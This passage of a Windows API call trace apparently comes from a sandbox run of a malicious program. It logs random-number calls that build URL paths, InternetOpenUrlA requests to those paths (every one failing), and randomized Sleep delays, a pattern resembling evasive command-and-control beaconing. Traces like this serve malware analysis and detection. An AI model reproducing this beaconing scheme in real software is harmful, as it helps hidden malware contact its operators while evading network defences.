pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.708] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.708] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.708] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.708] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.708] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.708] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.708] GetProcessHeap () returned 0x440000 [0221.708] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472b10 [0221.708] lstrcpyA (in: lpString1=0x472b10, lpString2="\x81\x03" | out: lpString1="\x81\x03") returned="\x81\x03" [0221.708] lstrcatA (in: lpString1="\x81\x03", lpString2="/1tfrufrqLrt63uQp34oyjDWLK01/vrmYbgzykr97cnhaay/" | out: lpString1="\x81\x03/1tfrufrqLrt63uQp34oyjDWLK01/vrmYbgzykr97cnhaay/") returned="\x81\x03/1tfrufrqLrt63uQp34oyjDWLK01/vrmYbgzykr97cnhaay/" [0221.708] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0221.708] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x81\x03/1tfrufrqLrt63uQp34oyjDWLK01/vrmYbgzykr97cnhaay/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0221.708] GetProcessHeap () returned 0x440000 [0221.709] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472b10 | out: hHeap=0x440000) returned 1 [0221.709] GetProcessHeap () returned 0x440000 [0221.709] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a1b250 | out: hHeap=0x440000) returned 1 [0221.709] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0221.709] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0221.709] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.709] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0221.709] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0221.709] Sleep (dwMilliseconds=0x1008b) [0222.175] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.175] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0222.175] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.175] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0222.175] GetProcessHeap () returned 0x440000 [0222.175] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x33) returned 0x4f59b0 [0222.175] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.175] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0222.176] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.176] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4f59b1, cbBuffer=0x17, dwFlags=0x2 | out: pbBuffer=0x4f59b1) returned 0x0 [0222.176] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.176] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0222.176] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.176] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0222.176] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.176] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0222.176] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.176] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0222.176] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.176] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0222.177] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.496] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0222.497] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.497] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0222.497] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.497] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0222.497] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.497] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0222.498] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.498] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0222.498] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.498] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0222.498] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.498] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0222.499] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.499] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0222.499] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.499] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0222.499] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.499] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0222.500] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.500] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0222.500] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.500] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0222.500] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.500] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0222.501] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.501] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0222.501] GetProcessHeap () returned 0x440000 [0222.501] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473140 [0222.501] lstrcpyA (in: lpString1=0x473140, lpString2="\x81\x03" | out: lpString1="\x81\x03") returned="\x81\x03" [0222.501] lstrcatA (in: lpString1="\x81\x03", lpString2="/pke1cawjHEokk5af3dndJz/" | out: lpString1="\x81\x03/pke1cawjHEokk5af3dndJz/") returned="\x81\x03/pke1cawjHEokk5af3dndJz/" [0222.501] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0222.501] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x81\x03/pke1cawjHEokk5af3dndJz/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0222.501] GetProcessHeap () returned 0x440000 [0222.502] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473140 | out: hHeap=0x440000) returned 1 [0222.502] GetProcessHeap () returned 0x440000 [0222.502] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4f59b0 | out: hHeap=0x440000) returned 1 [0222.502] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0222.502] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0222.502] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.502] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0222.502] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0222.502] Sleep (dwMilliseconds=0x13b41) [0222.767] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.767] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0222.767] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.767] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0222.767] GetProcessHeap () returned 0x440000 [0222.767] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x95) returned 0x3a16800 [0222.767] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.767] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0222.767] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.767] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a16801, cbBuffer=0x15, dwFlags=0x2 | out: pbBuffer=0x3a16801) returned 0x0 [0222.767] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.767] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0222.768] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.768] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0222.768] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.768] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0222.768] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.768] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0222.768] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.768] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0222.768] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.768] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0222.769] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.769] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0222.769] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.769] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0222.769] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.769] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0222.769] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.769] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0222.769] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.769] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0222.769] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.769] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0222.770] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.770] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0222.770] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.770] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0222.770] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.770] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0222.770] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.770] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0222.770] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.770] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a16816, cbBuffer=0x24, dwFlags=0x2 | out: pbBuffer=0x3a16816) returned 0x0 [0222.770] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.770] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0222.771] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.771] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0222.771] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.771] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0222.771] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.771] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0222.771] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.771] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0222.771] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.771] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0222.772] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.772] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0222.772] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.772] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0222.772] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.772] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0222.772] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.772] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0222.772] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.772] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0222.773] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.773] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0222.773] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.773] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0222.773] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.773] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0222.773] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.773] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0222.773] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.774] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0222.774] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.774] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0222.774] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.774] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0222.774] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.774] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0222.774] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.774] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0222.774] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.774] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0222.775] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.775] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0222.775] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.775] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0222.775] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.775] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0222.775] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.775] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0222.775] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.775] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0222.776] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.776] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1683a, cbBuffer=0x15, dwFlags=0x2 | out: pbBuffer=0x3a1683a) returned 0x0 [0222.776] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.776] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0222.776] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.776] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0222.776] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.776] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0222.776] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.776] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0222.777] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.777] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0222.777] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.777] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0222.777] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.777] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0222.777] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 